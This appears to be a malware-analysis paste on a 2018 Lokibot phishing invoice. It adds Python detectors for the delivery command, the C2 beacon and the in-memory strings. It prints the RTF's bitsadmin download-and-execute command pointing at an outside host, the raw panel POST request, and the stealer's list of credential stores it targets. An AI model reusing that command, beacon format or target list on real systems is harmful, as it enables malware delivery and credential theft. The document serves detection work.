Neonprimetime

2018-04-19 Lokibot sample invoice email

Apr 19th, 2018
Found by @neonprimetime, 4/10/2018
Subject: Priority :Invoice, PL & BL(Validate and confirm for final payment)
Attachment: L5643290HS.doc
MD5: 33c06f02d43545be1b8baa567775402d
https://www.reverse.it/sample/729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf?environmentId=100
Sending IP: 104.47.33.228 (outlook.com)

The .doc attachment is actually an RTF file; when opened it runs bitsadmin to download the Lokibot payload into the user's profile directory and then executes it:

cmd.exe /c bitsadmin /transfer sY /priority foreground http://tpreiastephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe

Payload MD5: 29BEE3FCCFE036A03281B7940718D38F
https://www.reverse.it/sample/a66f989e58ada2eff729ac2032ff71a159c521e7372373f4a1c1cf13f8ae2f0c?environmentId=100

The payload is Lokibot (here is another sample to compare against: https://pastebin.com/pArSzS01 )
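One way to catch this delivery chain from process-creation telemetry (Sysmon event 1 or Security 4688 command lines) is to flag bitsadmin /transfer jobs that pull from an http(s) URL into a user-writable location and are chained to execution of the downloaded file. The Python below is an added example, not part of the original paste or of any sandbox's code; the first command line is the one the RTF launched, the other two are constructed for the demonstration, and the severity labels are my own thresholds.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Process-creation command lines to scan (Sysmon EID 1 / Security 4688 style).
# The first is the one launched by the RTF above; the other two are CONSTRUCTED
# for this demo (an admin-looking transfer to a system path, and an unrelated command).
SAMPLE_CMDLINES = [
    r"cmd.exe /c bitsadmin /transfer sY /priority foreground http://tpreiastephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe",
    r"bitsadmin.exe /transfer patch /download /priority normal http://wsus.corp.example/kb123.msu C:\Windows\Temp\kb123.msu",
    r"cmd.exe /c dir %USERPROFILE%",
]

URL_RE = re.compile(r"^https?://", re.I)
# Prefixes of locations a standard user can write to (compared lower-cased).
USER_WRITABLE = ("%userprofile%", "%temp%", "%tmp%", "%appdata%",
                 "%localappdata%", "%public%", "c:\\users\\")


@dataclass
class Finding:
    url: str
    dest: str
    user_writable: bool
    executed: bool

    @property
    def severity(self) -> str:
        # Download + execute in one chain is the classic dropper pattern.
        if self.executed:
            return "high"
        return "medium" if self.user_writable else "low"


def split_chain(cmdline: str) -> List[str]:
    """Split a cmd.exe line on its operators (&&, ||, |, &), longest first.
    Caveat: a bare '&' inside an unquoted URL query string would also split."""
    return [p.strip() for p in re.split(r"\|\||&&|\||&", cmdline) if p.strip()]


def tokens(segment: str) -> List[str]:
    """Whitespace tokenizer that keeps double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', segment)]


def is_bitsadmin(tok: str) -> bool:
    t = tok.lower()
    return t in ("bitsadmin", "bitsadmin.exe") or t.endswith("\\bitsadmin.exe")


def analyze(cmdline: str) -> Optional[Finding]:
    """Return a Finding for a bitsadmin /transfer from an http(s) URL, else None."""
    segments = split_chain(cmdline)
    for i, seg in enumerate(segments):
        toks = tokens(seg)
        if not any(is_bitsadmin(t) for t in toks):
            continue
        if not any(t.lower() == "/transfer" for t in toks):
            continue
        url, dest = None, ""
        for j, t in enumerate(toks):
            if URL_RE.match(t):
                # bitsadmin syntax: ... <remote URL> <local path>
                url = t
                dest = toks[j + 1] if j + 1 < len(toks) else ""
                break
        if url is None:
            continue
        dl = dest.lower()
        user_writable = dl.startswith(USER_WRITABLE)
        # Is the downloaded file referenced by a later segment ("start <dest>" or
        # invoked directly)? That turns a plain download into download-and-execute.
        executed = any(bool(dl) and dl in (t.lower() for t in tokens(later))
                       for later in segments[i + 1:])
        return Finding(url, dest, user_writable, executed)
    return None


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        f = analyze(line)
        print(f"{f.severity if f else 'none':6} {line[:70]}")
```

The same logic ports directly to a SIEM query: process name bitsadmin.exe, command line containing /transfer and http, destination under a user-writable path, and a sibling process launched from that path shortly after.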
  16.  
-------------------------------
interesting network connections
-------------------------------
HTTP POSTs to 216.222.194.136:80 (Host: alongsidecoach.com; the /wp-content/ path indicates a WordPress site being used for the Lokibot panel gate). The HTTP/1.0 request line, the hard-coded User-Agent Mozilla/4.08 (Charon; Inferno), the non-standard Content-Key header and the ckav.ru string in the binary body are the useful network fingerprints:

POST /wp-content/along/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: alongsidecoach.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E292D1AA
Content-Length: 159
Connection: close
..(.......ckav.ru.
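The request above can be fingerprinted without decoding the body. The Python parser below is an added example, not code from the paste or from any IDS ruleset; it rebuilds the captured headers verbatim, but the 159-byte body is constructed around the one visible string ckav.ru because the paste does not show the full bytes, and the three-indicator alert threshold is an assumption.

```python
import re
from typing import Dict, List, Tuple

LOKI_UA = "Mozilla/4.08 (Charon; Inferno)"

# Headers exactly as captured above. The 159-byte body is CONSTRUCTED: placeholder
# bytes around the one string ("ckav.ru") that is visible in the paste.
SAMPLE_BEACON = (
    b"POST /wp-content/along/five/fre.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: alongsidecoach.com\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: E292D1AA\r\n"
    b"Content-Length: 159\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x12\x00(\x00\x01\x00\x00\x00\x00\x00\x00ckav.ru\x00" + b"\x00" * 140
)

# A CONSTRUCTED ordinary browser form POST, for comparison.
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/59.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 27\r\n"
    b"\r\n"
    b"user=alice&password=secret1"
)


def parse_request(raw: bytes) -> Tuple[str, str, str, Dict[str, str], bytes]:
    """Minimal HTTP/1.x request parser: (method, path, version, headers, body).
    Header names are lower-cased; the body is returned as raw bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body


def lokibot_indicators(raw: bytes) -> List[str]:
    """Return the Lokibot beacon traits present in a raw request."""
    method, path, version, h, body = parse_request(raw)
    hits: List[str] = []
    if method == "POST" and version == "HTTP/1.0":
        hits.append("POST over HTTP/1.0")
    if h.get("user-agent") == LOKI_UA:
        hits.append("hard-coded User-Agent " + LOKI_UA)
    if re.fullmatch(r"[0-9A-F]{8}", h.get("content-key", "")):
        hits.append("8-hex-digit Content-Key header")
    if (h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("binary octet-stream body")
    if path.lower().endswith("/fre.php"):
        hits.append("panel gate path fre.php")
    if b"ckav.ru" in body:
        hits.append("ckav.ru marker in body")
    return hits


def is_lokibot_beacon(raw: bytes, min_hits: int = 3) -> bool:
    """Alert when at least min_hits traits co-occur (threshold is an assumption)."""
    return len(lokibot_indicators(raw)) >= min_hits


if __name__ == "__main__":
    for name, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(name, is_lokibot_beacon(req), lokibot_indicators(req))
```

Requiring several traits together keeps a single odd header from firing on its own, while the User-Agent string alone is specific enough that most IDS rules for this family key on it.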
  31.  
--------------------------------
interesting in-memory strings
--------------------------------
The strings below are the stealer's target list: Chromium-based browsers, Gecko profiles (Firefox, SeaMonkey, Thunderbird and forks, decrypted via nss3.dll and PK11SDR_Decrypt), the Windows Credential Vault (vaultcli.dll) and IE IntelliForms storage, mail clients (Outlook profiles, Foxmail, IncrediMail) and a long list of FTP/SFTP/SSH clients (FileZilla, WinSCP under Software\Martin Prikryl, PuTTY/KiTTY sessions, Total Commander, WS_FTP, Xftp). The byte lengths in parentheses show that the paths and registry keys are stored as UTF-16LE (Google\Chrome is 13 characters, 26 bytes) while the imported API names are plain ASCII (VaultEnumerateItems, 19 bytes).

0x4a0074 (55): http://alongsidecoach.com/wp-content/along/five/fre.php
0x2fd82e6 (26): Comodo\Dragon
0x2fd8302 (44): MapleStudio\ChromePlus
0x2fd8332 (26): Google\Chrome
0x2fd8396 (26): Titan Browser
0x2fd83be (40): Yandex\YandexBrowser
0x2fd83ea (40): Epic Privacy Browser
0x2fd8416 (28): CocCoc\Browser
0x2fd8446 (30): Comodo\Chromodo
0x2fd847a (26): Coowon\Coowon
0x2fd8496 (30): Mustang Browser
0x2fd84b6 (36): 360Browser\Browser
0x2fd84de (40): CatalinaGroup\Citrio
0x2fd850a (34): Google\Chrome SxS
0x2fd854e (44): \Opera\Opera Next\data
0x2fd857e (56): \Opera Software\Opera Stable
0x2fd85ba (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
0x2fd8622 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
0x2fd868e (24): vaultcli.dll
0x2fd86aa (19): VaultEnumerateItems
0x2fd86be (20): VaultEnumerateVaults
0x2fd86e2 (12): VaultGetItem
0x2fd86f2 (14): VaultOpenVault
0x2fd8702 (15): VaultCloseVault
0x2fd8712 (116): Software\Microsoft\Internet Explorer\IntelliForms\Storage2
0x2fd87b2 (92): Software\Microsoft\Internet Explorer\TypedURLs
0x2fd881a (84): SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins
0x2fd888e (17): encryptedUsername
0x2fd88a2 (17): encryptedPassword
0x2fd88b6 (28): %s\logins.json
0x2fd88d6 (22): %s\prefs.js
0x2fd88ee (34): %s\signons.sqlite
0x2fd8912 (22): signons.txt
0x2fd892a (24): signons2.txt
0x2fd8946 (24): signons3.txt
0x2fd8962 (62): %s\Mozilla\Firefox\profiles.ini
0x2fd89a2 (60): %s\Mozilla\Firefox\Profiles\%s
0x2fd89e2 (66): %s\Mozilla\SeaMonkey\profiles.ini
0x2fd8a2a (64): %s\Mozilla\SeaMonkey\Profiles\%s
0x2fd8a6e (58): %s\Flock\Browser\profiles.ini
0x2fd8aaa (56): %s\Flock\Browser\Profiles\%s
0x2fd8ae6 (54): %s\Thunderbird\profiles.ini
0x2fd8b1e (52): %s\Thunderbird\Profiles\%s
0x2fd8b56 (48): %s\K-Meleon\profiles.ini
0x2fd8b8a (28): %s\K-Meleon\%s
0x2fd8baa (64): %s\Comodo\IceDragon\profiles.ini
0x2fd8bf2 (62): %s\Comodo\IceDragon\Profiles\%s
0x2fd8c32 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
0x2fd8c92 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
0x2fd8cee (46): %s\Postbox\profiles.ini
0x2fd8d1e (44): %s\Postbox\Profiles\%s
0x2fd8d52 (74): %s\8pecxstudios\Cyberfox\profiles.ini
0x2fd8da2 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
0x2fd8df2 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
0x2fd8e52 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
0x2fd8eb2 (50): %s\FossaMail\profiles.ini
0x2fd8ee6 (48): %s\FossaMail\Profiles\%s
0x2fd8f1a (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
0x2fd8ff6 (22): %s\nss3.dll
0x2fd901a (12): NSS_Shutdown
0x2fd902a (23): PK11_GetInternalKeySlot
0x2fd9042 (13): PK11_FreeSlot
0x2fd9052 (17): PK11_Authenticate
0x2fd9066 (15): PK11SDR_Decrypt
0x2fd9076 (22): PK11_CheckUserPassword
0x2fd908e (16): SECITEM_FreeItem
0x2fd90a2 (22): sqlite3.dll
0x2fd90ba (28): mozsqlite3.dll
0x2fd90ee (16): sqlite3_finalize
0x2fd9102 (12): sqlite3_step
0x2fd9112 (13): sqlite3_close
0x2fd9122 (19): sqlite3_column_text
0x2fd9136 (14): sqlite3_open16
0x2fd9146 (18): sqlite3_prepare_v2
0x2fd915a (15): sqlite3_prepare
0x2fd916a (28): CurrentVersion
0x2fd918a (64): SOFTWARE\Mozilla\Mozilla Firefox
0x2fd91d6 (20): %s\%s\Main
0x2fd91ee (34): Install Directory
0x2fd922a (72): SOFTWARE\Mozilla\Mozilla Thunderbird
0x2fd9276 (52): SOFTWARE\Mozilla\FossaMail
0x2fd92ae (48): SOFTWARE\Postbox\Postbox
0x2fd92e2 (44): SOFTWARE\Mozilla\Flock
0x2fd9312 (40): SOFTWARE\Flock\Flock
0x2fd934a (28): %ProgramW6432%
0x2fd936a (42): %s\NETGATE\Black Hawk
0x2fd9396 (52): SOFTWARE\Mozilla\Pale Moon
0x2fd93d2 (140): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
0x2fd9462 (34): SOFTWARE\K-Meleon
0x2fd949a (72): SOFTWARE\ComodoGroup\IceDragon\Setup
0x2fd94fa (64): SOFTWARE\8pecxstudios\Cyberfox86
0x2fd953e (60): SOFTWARE\8pecxstudios\Cyberfox
0x2fd957e (60): SOFTWARE\mozilla.org\SeaMonkey
0x2fd95be (38): %s\Mozilla\Profiles
0x2fd95ee (52): SOFTWARE\Mozilla\SeaMonkey
0x2fd9626 (50): SOFTWARE\Mozilla\Waterfox
0x2fd9672 (22): firefox.exe
0x2fd9696 (24): kernel32.dll
0x2fd96b2 (11): CloseHandle
0x2fd96be (11): CreateFileW
0x2fd96d6 (11): ExitProcess
0x2fd96e2 (22): Crypt32.dll
0x2fd96fa (20): CryptStringToBinaryA
0x2fd9712 (22): Shlwapi.dll
0x2fd9732 (14): GetProcAddress
0x2fd9742 (12): LoadLibraryW
0x2fd977a (39): X!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb
0x2fd97a2 (42): form_password_control
0x2fd97ce (42): form_username_control
0x2fd97fa (108): Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
0x2fd986a (84): %s\QupZilla\profiles\default\browsedata.db
0x2fd98ee (20): InstallDir
0x2fd990a (72): SOFTWARE\Apple Computer, Inc.\Safari
0x2fd995a (88): %s\Apple Computer\Preferences\keychain.plist
0x2fd99ba (78): %s\Apple Application Support\plutil.exe
0x2fd9a16 (54): -convert xml1 -s -o %s "%s"
0x2fd9a4e (56): %s\Data\AccCfg\Accounts.tdat
0x2fd9a8a (20): %s\Storage
0x2fd9aa2 (24): Account.rec0
0x2fd9abe (30): %s\Foxmail\mail
0x2fd9aea (26): %SYSTEMDRIVE%
0x2fd9b1a (24): EmailAddress
0x2fd9b36 (20): Technology
0x2fd9b72 (20): PopAccount
0x2fd9b8a (22): PopPassword
0x2fd9ba2 (20): SmtpServer
0x2fd9bce (22): SmtpAccount
0x2fd9be6 (24): SmtpPassword
0x2fd9c02 (62): Software\IncrediMail\Identities
0x2fd9c66 (20): POP3Server
0x2fd9c9e (36): SMTP Email Address
0x2fd9cc6 (22): SMTP Server
0x2fd9cde (28): SMTP User Name
0x2fd9d12 (22): POP3 Server
0x2fd9d2a (28): POP3 User Name
0x2fd9d5e (36): NNTP Email Address
0x2fd9d86 (28): NNTP User Name
0x2fd9da6 (22): NNTP Server
0x2fd9dbe (22): IMAP Server
0x2fd9dd6 (28): IMAP User Name
0x2fd9e1e (30): HTTP Server URL
0x2fd9e3e (36): HTTPMail User Name
0x2fd9e66 (30): HTTPMail Server
0x2fd9ec2 (28): POP3 Password2
0x2fd9ee2 (28): IMAP Password2
0x2fd9f02 (28): NNTP Password2
0x2fd9f22 (36): HTTPMail Password2
0x2fd9f4a (28): SMTP Password2
0x2fd9f6a (26): POP3 Password
0x2fd9f86 (26): IMAP Password
0x2fd9fa2 (26): NNTP Password
0x2fd9fbe (26): HTTP Password
0x2fd9fda (26): SMTP Password
0x2fd9ffa (178): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
0x2fda0b2 (110): Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
0x2fda122 (110): Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
0x2fda192 (30): %s\32BitFtp.TMP
0x2fda1b2 (30): %s\32BitFtp.ini
0x2fda1d2 (54): %s\Estsoft\ALFTP\ESTdb2.dat
0x2fda20a (22): %s\site.xml
0x2fda222 (46): %s\BitKinex\bitkinex.ds
0x2fda26e (30): LastUsedProfile
0x2fda28e (56): Software\Bitvise\BvSshClient
0x2fda2ca (40): %s\BlazeFtp\site.dat
0x2fda2fa (72): Software\FlashPeak\BlazeFtp\Settings
0x2fda346 (24): LastPassword
0x2fda376 (22): LastAddress
0x2fda3da (88): Software\NCH Software\ClassicFTP\FTPAccounts
0x2fda456 (24): %s\Cyberduck
0x2fda472 (22): user.config
0x2fda48a (30): %s\iterate_GmbH
0x2fda4aa (30): %s\EasyFTP\data
0x2fda4f2 (26): %s\ExpanDrive
0x2fda50e (26): *favorites.js
0x2fda56a (60): Software\Far\Plugins\FTP\Hosts
0x2fda5aa (62): Software\Far2\Plugins\FTP\Hosts
0x2fda5ea (148): %s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
0x2fda682 (52): %s\FileZilla\Filezilla.xml
0x2fda6ba (52): %s\FileZilla\filezilla.xml
0x2fda6f2 (60): %s\FileZilla\recentservers.xml
0x2fda732 (56): %s\FileZilla\sitemanager.xml
0x2fda76e (22): %s\FlashFXP
0x2fda786 (20): *Sites.dat
0x2fda79e (20): *quick.dat
0x2fda7ca (22): FtpUserName
0x2fda7e2 (22): FtpPassword
0x2fda7fa (24): _FtpPassword
0x2fda81a (72): Software\NCH Software\Fling\Accounts
0x2fda86a (78): %s\FreshWebmaster\FreshFTP\FtpSites.SMF
0x2fda8ba (46): %s\FTPBox\profiles.conf
0x2fda8ea (64): %s\FTPGetter\Profile\servers.xml
0x2fda92e (48): %s\FTPGetter\servers.xml
0x2fda962 (50): %s\FTPInfo\ServerList.xml
0x2fda996 (50): %s\FTPInfo\ServerList.cfg
0x2fda9ca (56): %s\FTP Navigator\Ftplist.txt
0x2fdaa06 (40): %s\FTP Now\sites.xml
0x2fdaa32 (48): %s\FTPShell\ftpshell.fsi
0x2fdaa6a (64): %s\.config\fullsync\profiles.xml
0x2fdaaae (44): %s\DeluxeFTP\sites.xml
0x2fdaae2 (66): %s\GoFTP\settings\Connections.txt
0x2fdab5a (36): %s\%s%i\encPwd.jsd
0x2fdab82 (78): %s\%s%i\data\settings\sshProfiles-j.jsd
0x2fdabd2 (78): %s\%s%i\data\settings\ftpProfiles-j.jsd
0x2fdac46 (60): Software\LinasFTP\Site Manager
0x2fdac86 (52): %s\oZone3D\MyFTP\myftp.ini
0x2fdacbe (46): %s\NetDrive\NDSites.ini
0x2fdacee (46): %s\NetDrive2\drives.dat
0x2fdad22 (64): %s\Fastream NETFile\My FTP Links
0x2fdad6a (66): %s\NexusFile\userdata\ftpsite.ini
0x2fdadae (48): %s\NexusFile\ftpsite.ini
0x2fdade2 (64): %s\INSoftware\NovaFTP\NovaFTP.db
0x2fdae2a (90): %s\Notepad++\plugins\config\NppFTP\NppFTP.xml
0x2fdae8a (78): %s\Odin Secure FTP Expert\QFDefault.QFQ
0x2fdaeda (76): %s\Odin Secure FTP Expert\SiteInfo.QFP
0x2fdaf2a (26): PublicKeyFile
0x2fdaf46 (24): TerminalType
0x2fdaf62 (20): PortNumber
0x2fdaf7a (64): Software\9bis.com\KiTTY\Sessions
0x2fdafc2 (70): Software\SimonTatham\PuTTY\Sessions
0x2fdb026 (20): lsasrv.dll
0x2fdb03e (22): LsaICryptUnprotectData
0x2fdb072 (48): %s\Microsoft\Credentials
0x2fdb0a6 (22): Config Path
0x2fdb0be (50): Software\VanDyke\SecureFX
0x2fdb0f2 (22): %s\Sessions
0x2fdb13a (30): %s\SftpNetDrive
0x2fdb16a (84): %s\Sherrod Computers\sherrod FTP\favorites
0x2fdb1c2 (52): #document.favoriteManager*
0x2fdb1fa (22): %s\SmartFTP
0x2fdb222 (44): %s\Staff-FTP\sites.ini
0x2fdb252 (44): %s\Steed\bookmarks.txt
0x2fdb282 (26): %s\SuperPutty
0x2fdb30a (20): {.:CRED:.}
0x2fdb356 (24): %s\Syncovery
0x2fdb372 (26): Syncovery.ini
0x2fdb38e (28): %s\wcx_ftp.ini
0x2fdb3ae (44): %s\GHISLER\wcx_ftp.ini
0x2fdb3de (20): FtpIniName
0x2fdb3fa (64): Software\Ghisler\Total Commander
0x2fdb43e (42): %s\UltraFXP\sites.xml
0x2fdb46a (60): %s\WinFtp Client\Favorites.dat
0x2fdb4aa (20): FSProtocol
0x2fdb4c2 (46): Software\Martin Prikryl
0x2fdb4f2 (40): %s\WS_FTP\WS_FTP.INI
0x2fdb51e (26): %s\WS_FTP.INI
0x2fdb53a (22): %s\Ipswitch
0x2fdb552 (20): ws_ftp.ini
0x2fdb56a (52): %s\NetSarang\Xftp\Sessions
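The strings above are what you would use to confirm the stealer's capabilities in an unpacked sample or a memory region, and because their byte lengths show a mix of UTF-16LE paths and ASCII import names, an extractor has to handle both encodings or it will miss half the list. The Python below is an added example, not code from the paste; SAMPLE_BLOB is a constructed byte string carrying a handful of the page's strings in the encodings their lengths imply, and the grouping in TARGETS is my own.

```python
import re
from typing import Dict, List, Tuple

# Credential-target markers from the in-memory strings above, grouped by what they
# give the stealer access to (grouping is my own; matching is case-insensitive substring).
TARGETS: Dict[str, List[str]] = {
    "chromium_browsers": [r"Google\Chrome", r"Comodo\Dragon", r"Yandex\YandexBrowser",
                          r"Opera Software\Opera Stable", r"360Browser\Browser"],
    "gecko_profiles_nss": ["profiles.ini", "logins.json", "signons.sqlite",
                           "moz_logins", "nss3.dll", "PK11SDR_Decrypt"],
    "windows_vault_ie": ["vaultcli.dll", "VaultEnumerateItems",
                         r"IntelliForms\Storage2", "LsaICryptUnprotectData"],
    "mail_clients": ["Thunderbird", r"Outlook\Profiles\Outlook", "Foxmail",
                     r"IncrediMail\Identities", "SMTP Password", "POP3 Password"],
    "ftp_ssh_clients": [r"FileZilla\sitemanager.xml", r"PuTTY\Sessions", r"KiTTY\Sessions",
                        "Martin Prikryl", r"Ghisler\Total Commander", "WS_FTP.INI",
                        r"NetSarang\Xftp\Sessions", r"VanDyke\SecureFX"],
}


def extract_strings(blob: bytes, min_len: int = 6) -> List[Tuple[int, str, str]]:
    """Pull printable strings out of a byte blob in both encodings the page shows:
    plain ASCII (API names) and UTF-16LE (paths: one printable byte, one NUL).
    Returns (offset, encoding, text) sorted by offset."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found: List[Tuple[int, str, str]] = []
    for m in ascii_re.finditer(blob):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in wide_re.finditer(blob):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16le")))
    return sorted(found)


def classify(strings: List[Tuple[int, str, str]]) -> Dict[str, List[str]]:
    """Map extracted strings onto the TARGETS categories they indicate."""
    hits: Dict[str, List[str]] = {}
    for _, _, text in strings:
        low = text.lower()
        for category, markers in TARGETS.items():
            if any(marker.lower() in low for marker in markers):
                bucket = hits.setdefault(category, [])
                if text not in bucket:
                    bucket.append(text)
    return hits


def triage(blob: bytes) -> Dict[str, List[str]]:
    return classify(extract_strings(blob))


def _wide(s: str) -> bytes:
    return s.encode("utf-16le") + b"\x00\x00"


# CONSTRUCTED stand-in for an unpacked sample or memory region: a few of the page's
# strings in the encodings their byte lengths imply, separated by junk, plus one
# unrelated string that must not be classified. Note the extra NULs after the ASCII
# run: an ASCII char directly followed by a wide string would otherwise be absorbed
# as the first character of the wide match (a classic strings-extractor artifact).
SAMPLE_BLOB = (
    b"\x90" * 8
    + _wide(r"%s\Mozilla\Firefox\profiles.ini")
    + b"\x00\x00\x00\x00"
    + _wide(r"Google\Chrome")
    + b"PK11SDR_Decrypt\x00"
    + b"VaultEnumerateItems\x00\x00\x00"
    + _wide(r"Software\SimonTatham\PuTTY\Sessions")
    + _wide("SMTP Password")
    + b"\xff" * 5
    + b"notepad.exe\x00"
)

if __name__ == "__main__":
    for category, strings in triage(SAMPLE_BLOB).items():
        print(f"{category}: {strings}")
```

Run against a real unpacked Lokibot image or a dumped process region, the categories that light up tell you which credential stores on the host to treat as compromised; the same markers translate one-to-one into a YARA rule with `ascii` and `wide` modifiers.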